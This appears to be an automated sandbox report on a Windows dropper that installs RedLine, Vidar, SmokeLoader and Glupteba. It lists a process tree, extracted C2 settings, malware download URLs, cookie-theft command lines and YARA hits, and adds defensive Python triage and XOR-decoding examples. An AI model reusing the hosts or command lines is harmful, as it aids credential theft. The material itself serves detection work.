
Windows Analysis Report yevbZfdCqR.exe

Overview

General Information

Sample Name: yevbZfdCqR.exe
Analysis ID: 439281
MD5: 3568d61a49b61ce18bd6093748ffd32a
SHA1: 0f6c4618eb4fca4972869a56bf6d8b020e1440f8
SHA256: af350212764e6304bf417e81cf0009b494119670e4bc1b187cd79cf4c487c7b6
Tags: exe, RedLineStealer

Detection

Glupteba RedLine SmokeLoader Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
DLL reload attack detected
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Glupteba
Yara detected RedLine Stealer
Yara detected SmokeLoader
Yara detected Vidar stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
Allocates memory in foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates HTML files with .exe extension (expired dropper behavior)
Disable Windows Defender real time protection (registry)
Drops PE files to the document folder of the user
Found C&C like URL pattern
Found Tor onion address
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
May check the online IP address of the machine
May modify the system service descriptor table (often done to hook functions)
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Renames NTDLL to bypass HIPS
Sets debug register (to hijack the execution of another thread)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Antivirus or Machine Learning detection for unpacked file
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Classification (behaviour radar; the rendered chart is not reproduced): categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale clean, suspicious, malicious.
  • System is w10x64
  • yevbZfdCqR.exe (PID: 6872 cmdline: 'C:\Users\user\Desktop\yevbZfdCqR.exe' MD5: 3568D61A49B61CE18BD6093748FFD32A)
    • 9PWySv_SmMZ5POEp2PUJ_lbI.exe (PID: 6000 cmdline: 'C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe' MD5: 9E78E5805208ADE76F61A62A8E42D763)
    • ZteJ0k9a2sM9jXcC3SndaipD.exe (PID: 5988 cmdline: 'C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe' MD5: A4663FF564689BA0EFB19D8D82AA044F)
    • YX7wpjoMI0vZoMwVbFh9XNIC.exe (PID: 4240 cmdline: 'C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe' MD5: 643397C445A8CED70CB110E7720C491D)
      • conhost.exe (PID: 64 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • YX7wpjoMI0vZoMwVbFh9XNIC.exe (PID: 7008 cmdline: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe MD5: 643397C445A8CED70CB110E7720C491D)
    • MQ5u6_H0cs9EUXsesfNpGUNc.exe (PID: 6588 cmdline: 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe' MD5: DF518E39A56E4EA23D0B2442FFD42AEE)
      • MQ5u6_H0cs9EUXsesfNpGUNc.exe (PID: 6224 cmdline: 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe' MD5: DF518E39A56E4EA23D0B2442FFD42AEE)
    • awTgWtFfNpBsevxQFHzT446w.exe (PID: 6300 cmdline: 'C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe' MD5: F517276868E5C46A449A5F73603B4E6A)
    • ulVElw2mPS2j3QKCM9gOxM3j.exe (PID: 6296 cmdline: 'C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe' MD5: 856CF6ED735093F5FE523F0D99E18424)
    • Xl5_fidIgZFRU48uwkdfjZGj.exe (PID: 4940 cmdline: 'C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe' MD5: 41C69A7F93FBE7EDC44FD1B09795FA67)
      • conhost.exe (PID: 6252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 4420 cmdline: 'C:\Windows\system32\rUNdlL32.eXe' 'C:\Users\user\AppData\Local\Temp\axhub.dll',axhub MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • oO2a8x5RXTHKygCXkT7syx3J.exe (PID: 6716 cmdline: 'C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe' MD5: 3FA93FEB10F08753F207064325EE1274)
    • gUlDp5No64Xfcgfbo3IlvG0y.exe (PID: 6768 cmdline: 'C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe' MD5: F85B88D232A348BF82B2B553F50DFBB8)
    • LPBuRcBvc7urPUzoi5RqTFtn.exe (PID: 4780 cmdline: 'C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe' MD5: AED57D50123897B0012C35EF5DEC4184)
      • jfiag3g_gg.exe (PID: 6944 cmdline: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt MD5: 7FEE8223D6E4F82D6CD115A28F0B6D58)
      • jfiag3g_gg.exe (PID: 5048 cmdline: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt MD5: A6279EC92FF948760CE53BBA817D6A77)
    • M5uLwz0sXvZcR89u_43Nm9v8.exe (PID: 1372 cmdline: 'C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe' MD5: 623C88CC55A2DF1115600910BBE14457)
      • file4.exe (PID: 7036 cmdline: 'C:\Program Files (x86)\Company\NewProduct\file4.exe' MD5: 02580709C0E95ABA9FDD1FBDF7C348E9)
      • jooyu.exe (PID: 4112 cmdline: 'C:\Program Files (x86)\Company\NewProduct\jooyu.exe' MD5: AED57D50123897B0012C35EF5DEC4184)
        • jfiag3g_gg.exe (PID: 4652 cmdline: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt MD5: A6279EC92FF948760CE53BBA817D6A77)
        • jfiag3g_gg.exe (PID: 4660 cmdline: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt MD5: A6279EC92FF948760CE53BBA817D6A77)
      • jingzhang.exe (PID: 6984 cmdline: 'C:\Program Files (x86)\Company\NewProduct\jingzhang.exe' MD5: A4C547CFAC944AD816EDF7C54BB58C5C)
        • conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • md8_8eus.exe (PID: 5636 cmdline: 'C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe' MD5: 7A151DB96E506BD887E3FFA5AB81B1A5)
    • BqbASL8ovE3o_gRiKrvwENXN.exe (PID: 6248 cmdline: 'C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe' MD5: 663FDF847D6B11308415FF86EBFFC275)
    • 5hIw8OebGuR7XztS5WBp_Scm.exe (PID: 6424 cmdline: 'C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe' MD5: E517017DD8609B293C5ADB489BE918FD)
      • NVdpapR9v21C.exe (PID: 4768 cmdline: 'C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe' MD5: BB4FD26AB95CB6D7EB25F95AC1F3C2DA)
      • Browzar.exe (PID: 5616 cmdline: 'C:\Program Files (x86)\Browzar\Browzar.exe' MD5: 847674F996283EB11F244A75F14F69AB)
    • KyTQCmNmjazMZrvIWzjrSsQG.exe (PID: 6476 cmdline: 'C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe' MD5: EA57C9A4177B1022EC4D053AF865CBC9)
    • gDoWsyv4ZlqhjBKjyfkjR1BY.exe (PID: 6616 cmdline: 'C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe' MD5: FF5864B23CEF0169322395F961AF31E9)
  • svchost.exe (PID: 340 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup
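The process tree above carries several patterns a detection engineer would turn into rules: executables launched from the user's Documents folder and from AppData\Local\Temp, rundll32 invoked with a case-mangled name ('rUNdlL32.eXe') to load a DLL from Temp, a dropper in Documents starting a fake "Company\NewProduct" install under Program Files, and jfiag3g_gg.exe run with /scookiestxt (the NirSoft cookies.txt export switch; the PDB paths later in the report identify that binary as ChromeCookiesView/EdgeCookiesView). The following is an added Python example, not Joe Sandbox code or output: the events are constructed from the tree, the parent of the top-level sample is assumed to be Explorer, and the field names are this example's own simplification of a Sysmon-style process-creation record.

```python
"""Process-tree triage rules, added as an example to this report (not Joe
Sandbox code). The events below are constructed from the report's process
tree; the field names (pid, image, cmdline, parent_image) are this example's
own simplification of a Sysmon-style process-creation record.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # resolved image path of the new process
    cmdline: str        # command line exactly as launched (quotes included)
    parent_image: str   # image path of the parent process


# Directories an unprivileged user can write to; PEs launched from here, or
# DLLs loaded from here by a LOLBin, are the droppers and payloads in the tree.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(Documents|Downloads|AppData\\Local\\Temp)|ProgramData)\\",
    re.IGNORECASE,
)
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe"}
# NirSoft cookies.txt export switch, as used by jfiag3g_gg.exe in the tree.
COOKIE_EXPORT = re.compile(r"(^|\s)/scookiestxt(\s|$)", re.IGNORECASE)


def first_token(cmdline: str):
    """Split the executable token (quoted with ' or ", or bare) from its arguments."""
    m = re.match(r"""\s*(["'])(.*?)\1|\s*(\S+)""", cmdline)
    if not m:
        return "", ""
    exe = m.group(2) if m.group(2) is not None else m.group(3)
    return exe, cmdline[m.end():]


def evaluate(ev: ProcEvent) -> list:
    """Return the names of every rule the event trips (empty list = no hit)."""
    hits = []
    exe_as_typed, args = first_token(ev.cmdline)
    name = exe_as_typed.rsplit("\\", 1)[-1]

    if USER_WRITABLE.search(ev.image):
        hits.append("exe_in_user_writable_dir")
    # 'rUNdlL32.eXe': a case-mangled LOLBin name defeats exact-match string rules
    if name.lower() in LOLBINS and name not in (name.lower(), name.upper()):
        hits.append("mixed_case_lolbin_name")
    if name.lower() == "rundll32.exe" and USER_WRITABLE.search(args):
        hits.append("rundll32_loads_user_writable_dll")
    if COOKIE_EXPORT.search(args):
        hits.append("nirsoft_cookie_export_switch")
    # a PE run from a user directory starting a 'product' it placed under Program Files
    if USER_WRITABLE.search(ev.parent_image) and ev.image.lower().startswith(r"c:\program files"):
        hits.append("user_dir_parent_runs_program_files_exe")
    return hits


def triage(events):
    """Map pid -> rule hits for every event that tripped at least one rule."""
    result = {}
    for ev in events:
        hits = evaluate(ev)
        if hits:
            result[ev.pid] = hits
    return result


# Constructed from the process tree (parents taken from the tree nesting; the
# parent of the submitted sample is assumed to be Explorer).
SAMPLE_EVENTS = [
    ProcEvent(6872, r"C:\Users\user\Desktop\yevbZfdCqR.exe",
              r"'C:\Users\user\Desktop\yevbZfdCqR.exe'", r"C:\Windows\Explorer.EXE"),
    ProcEvent(6000, r"C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe",
              r"'C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe'",
              r"C:\Users\user\Desktop\yevbZfdCqR.exe"),
    ProcEvent(4420, r"C:\Windows\system32\rundll32.exe",
              r"'C:\Windows\system32\rUNdlL32.eXe' 'C:\Users\user\AppData\Local\Temp\axhub.dll',axhub",
              r"C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe"),
    ProcEvent(6944, r"C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe",
              r"C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt",
              r"C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe"),
    ProcEvent(7036, r"C:\Program Files (x86)\Company\NewProduct\file4.exe",
              r"'C:\Program Files (x86)\Company\NewProduct\file4.exe'",
              r"C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe"),
    # benign control (constructed, not from the report): ordinary rundll32 use
    ProcEvent(1000, r"C:\Windows\system32\rundll32.exe",
              r"C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,Control_RunDLL",
              r"C:\Windows\Explorer.EXE"),
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, hits)
```

The mixed-case check reads the executable name as it was typed on the command line rather than the resolved image path, because the image path is normalised by the OS and loses the evidence. Note that the sample itself (PID 6872, run from Desktop) trips nothing here; the signal is in what it spawns.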
RedLine (extracted configuration):
{
  "C2 url": [
    "ahannnavod.xyz:80"
  ],
  "Bot Id": "7500"
}
Vidar (extracted configuration; the "C2 url" is a nickname lookup on the legitimate api.faceit.com API, which Vidar uses as a dead-drop resolver to fetch its actual C2 address, so the domain itself is not the C2 and is a poor block-list candidate):
{
  "C2 url": "api.faceit.com/core/v1/nicknames/"
}
Memory dump YARA matches (Source | Rule | Description | Author; matched strings listed under each row):
00000025.00000000.966814169.000001DA29CD0000.00000040.00000001.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x6546e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000010.00000003.679617471.00000000020C0000.00000004.00000001.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x287e0:$xo1: cATGBBO\x01\x1B\x1E
00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000010.00000000.840587926.0000000000400000.00000040.00020000.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x295e0:$xo1: cATGBBO\x01\x1B\x1E
00000010.00000000.753598266.0000000000400000.00000040.00020000.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x295e0:$xo1: cATGBBO\x01\x1B\x1E
(table truncated: 39 entries in the full report)

Unpacked PE YARA matches (Source | Rule | Description | Author; matched strings listed under each row):
16.3.BqbASL8ovE3o_gRiKrvwENXN.exe.20c0000.0.unpack | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x279e0:$xo1: cATGBBO\x01\x1B\x1E
16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.12.raw.unpack | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x295e0:$xo1: cATGBBO\x01\x1B\x1E
16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.28.unpack | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x279e0:$xo1: cATGBBO\x01\x1B\x1E
16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.11.raw.unpack | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x287e0:$xo1: cATGBBO\x01\x1B\x1E
5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
(table truncated: 52 entries in the full report)
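What the repeated SUSP_XORed_Mozilla hits mean in practice: the rule matches the literal "Mozilla/5.0" under any single-byte XOR key, and the bytes reported for $xo1 (cATGBBO\x01\x1B\x1E) are exactly "Mozilla/5.0" XORed with 0x2E, with the NUL that the '.' produces under that key apparently dropped by the report's rendering. The Python below is an added example, not Joe Sandbox or signature-base code: it finds such occurrences in a buffer, recovers the key, and decodes the rest of the obfuscated string, which is the follow-up step an analyst takes after a YARA xor hit. The sample buffer and the user-agent tail are constructed; the only thing taken from the report is the $xo1 byte string.

```python
"""XOR-keyword recovery, added as an example to this report (not Joe Sandbox or
signature-base code). It reproduces what the SUSP_XORed_Mozilla matches mean:
"Mozilla/5.0" under a single-byte XOR key, here 0x2E as implied by the $xo1
bytes shown in the report. All sample data below is constructed.
"""
KEYWORD = b"Mozilla/5.0"


def find_xored(buf: bytes, keyword: bytes = KEYWORD):
    """Return (offset, key) for every single-byte-XOR occurrence of keyword.

    Key 0x00 is the plaintext keyword itself; it is reported as well so the
    caller can treat it separately, as a YARA 'xor' modifier would match it.
    """
    hits = []
    n = len(keyword)
    for off in range(len(buf) - n + 1):
        key = buf[off] ^ keyword[0]            # key implied by the first byte
        if all((buf[off + i] ^ key) == keyword[i] for i in range(n)):
            hits.append((off, key))
    return hits


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def recover_string(buf: bytes, off: int, key: int) -> bytes:
    """Decode forward from a hit until the decoded byte stops being printable
    ASCII, pulling the whole obfuscated string rather than just the keyword."""
    out = bytearray()
    for b in buf[off:]:
        c = b ^ key
        if not 0x20 <= c < 0x7F:
            break
        out.append(c)
    return bytes(out)


# Constructed sample buffer: a NUL-terminated user-agent string XORed with 0x2E
# (the key the report's $xo1 bytes imply), preceded by filler and followed by
# one plaintext copy of the keyword.
UA = b"Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
SAMPLE = b"\x00\x90MZ" + xor_bytes(UA + b"\x00", 0x2E) + b"Mozilla/5.0\x00"

# The report's $xo1 string, with the NUL the rendering dropped put back
# between \x1B and \x1E ('.' ^ 0x2E == 0x00).
REPORTED_XO1 = b"cATGBBO\x01\x1b\x00\x1e"

if __name__ == "__main__":
    assert xor_bytes(KEYWORD, 0x2E) == REPORTED_XO1
    for off, key in find_xored(SAMPLE):
        print(f"offset {off:#x} key {key:#04x}: {recover_string(SAMPLE, off, key)!r}")
```

Because the xor modifier also matches key 0x00, a rule of this shape needs a second, plaintext "Mozilla/5.0" string in its condition to exclude ordinary binaries; a hit with a non-zero key, as here, is the suspicious case, and the same key usually decodes the rest of the sample's string table.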

      Sigma Overview

      No Sigma rule has matched

      Signature Overview



      AV Detection:

      Antivirus detection for URL or domain
      Source: http://136.144.41.133/WW/file8.exe | Avira URL Cloud: Label: malware
      Source: http://marsdevelopmentsftwr.com/data/data.7z | Avira URL Cloud: Label: malware
      Source: http://136.144.41.133/WW/file4.exe | Avira URL Cloud: Label: malware
      Antivirus detection for dropped file
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exe | Avira: detection malicious, Label: TR/AD.JazoStealer.znvpf
      Source: C:\Program Files (x86)\Company\NewProduct\file4.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | Avira: detection malicious, Label: HEUR/AGEN.1114952
      Found malware configuration
      Source: 6.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.407d438.1.raw.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["ahannnavod.xyz:80"], "Bot Id": "7500"}
      Source: 5.3.ZteJ0k9a2sM9jXcC3SndaipD.exe.2620000.0.raw.unpack | Malware Configuration Extractor: Vidar {"C2 url": "api.faceit.com/core/v1/nicknames/"}
      Multi AV Scanner detection for domain / URL
      Source: nicepricingsaleregistration.com | Virustotal: Detection: 6%
      Source: jom.diregame.live | Virustotal: Detection: 7%
      Multi AV Scanner detection for dropped file
      Source: C:\Program Files (x86)\Company\NewProduct\file4.exe | Metadefender: Detection: 15%
      Source: C:\Program Files (x86)\Company\NewProduct\file4.exe | ReversingLabs: Detection: 78%
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe | Metadefender: Detection: 25%
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe | ReversingLabs: Detection: 79%
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exe | Metadefender: Detection: 41%
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exe | ReversingLabs: Detection: 89%
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | Metadefender: Detection: 34%
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | ReversingLabs: Detection: 93%
      Multi AV Scanner detection for submitted file
      Source: yevbZfdCqR.exe | Virustotal: Detection: 67%
      Source: yevbZfdCqR.exe | Metadefender: Detection: 25%
      Source: yevbZfdCqR.exe | ReversingLabs: Detection: 68%
      Yara detected Glupteba
      Source: Yara match | File source: Process Memory Space: KyTQCmNmjazMZrvIWzjrSsQG.exe PID: 6476, type: MEMORY
      Source: Yara match | File source: 19.3.KyTQCmNmjazMZrvIWzjrSsQG.exe.37e0000.0.unpack, type: UNPACKEDPE
      Machine Learning detection for dropped file
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Company\NewProduct\file4.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | Joe Sandbox ML: detected
      Antivirus or Machine Learning detection for unpacked file
      Source: 41.0.jfiag3g_gg.exe.400000.0.unpack | Avira: Label: TR/Crypt.ULPM.Gen
      Source: 1.3.yevbZfdCqR.exe.5bc4e20.12.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 1.3.yevbZfdCqR.exe.5b28ec0.54.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 1.3.yevbZfdCqR.exe.5bc4e20.2.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.2580e50.3.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 26.2.jooyu.exe.390000.0.unpack | Avira: Label: TR/Redcap.ahesa
      Source: 26.2.jooyu.exe.40f110.2.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 41.2.jfiag3g_gg.exe.400000.0.unpack | Avira: Label: TR/Crypt.ULPM.Gen
      Source: 13.0.LPBuRcBvc7urPUzoi5RqTFtn.exe.c6f110.2.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 13.2.LPBuRcBvc7urPUzoi5RqTFtn.exe.c6f110.7.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 1.3.yevbZfdCqR.exe.4f393c3.7.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 13.0.LPBuRcBvc7urPUzoi5RqTFtn.exe.bf0000.0.unpack | Avira: Label: TR/Redcap.ahesa
      Source: 13.0.LPBuRcBvc7urPUzoi5RqTFtn.exe.c9d110.3.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 33.0.jfiag3g_gg.exe.400000.0.unpack | Avira: Label: TR/Crypt.ULPM.Gen
      Source: 26.0.jooyu.exe.40f110.1.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 1.3.yevbZfdCqR.exe.5b65d60.13.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 36.0.jfiag3g_gg.exe.400000.0.unpack | Avira: Label: TR/Crypt.ULPM.Gen
      Source: 36.2.jfiag3g_gg.exe.400000.0.unpack | Avira: Label: TR/Crypt.ULPM.Gen
      Source: 25.2.file4.exe.6e0000.2.unpack | Avira: Label: TR/Patched.Ren.Gen2
      Source: 20.2.gDoWsyv4ZlqhjBKjyfkjR1BY.exe.41bf9a.3.unpack | Avira: Label: TR/Dropper.Gen
      Source: 1.3.yevbZfdCqR.exe.5b02020.5.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 25.2.file4.exe.6f0000.4.unpack | Avira: Label: TR/Dropper.Gen
      Source: 1.3.yevbZfdCqR.exe.5aeefe0.17.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 37.0.svchost.exe.1da29cd0000.4.unpack | Avira: Label: TR/ATRAPS.Gen2
      Source: 5.3.ZteJ0k9a2sM9jXcC3SndaipD.exe.2620000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 26.2.jooyu.exe.43d110.1.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 26.0.jooyu.exe.390000.0.unpack | Avira: Label: TR/Redcap.ahesa
      Source: 1.3.yevbZfdCqR.exe.5e52f40.20.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 11.3.oO2a8x5RXTHKygCXkT7syx3J.exe.2670000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 33.2.jfiag3g_gg.exe.400000.0.unpack | Avira: Label: TR/Crypt.ULPM.Gen
      Source: 20.2.gDoWsyv4ZlqhjBKjyfkjR1BY.exe.421b96.1.unpack | Avira: Label: TR/Dropper.Gen
      Source: 13.2.LPBuRcBvc7urPUzoi5RqTFtn.exe.bf0000.6.unpack | Avira: Label: TR/Redcap.ahesa
      Source: 13.2.LPBuRcBvc7urPUzoi5RqTFtn.exe.c9d110.9.unpack | Avira: Label: TR/Patched.Ren.Gen
      Source: 26.0.jooyu.exe.43d110.2.unpack | Avira: Label: TR/Patched.Ren.Gen

      Cryptography:

      Uses Microsoft's Enhanced Cryptographic Provider
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe | Code function: 1_2_0125E700 CryptGenRandom,CryptReleaseContext,__Init_thread_footer,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe | Code function: 1_2_0125DFC0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,CryptAcquireContextA,___std_exception_copy,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe | Code function: 1_2_0125E120 CryptAcquireContextA,GetLastError,CryptReleaseContext,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe | Code function: 1_2_012A3130 CryptReleaseContext,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe | Code function: 5_2_0040EBC3 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe | Code function: 5_2_0040E9C8 _memset,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe | Code function: 5_2_0040EB60 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe | Code function: 5_2_0040ECDA _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,

      Bitcoin Miner:

      Yara detected Glupteba
      Source: Yara match | File source: Process Memory Space: KyTQCmNmjazMZrvIWzjrSsQG.exe PID: 6476, type: MEMORY
      Source: Yara match | File source: 19.3.KyTQCmNmjazMZrvIWzjrSsQG.exe.37e0000.0.unpack, type: UNPACKEDPE

      Compliance:

      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe | Unpacked PE file: 4.2.9PWySv_SmMZ5POEp2PUJ_lbI.exe.400000.0.unpack
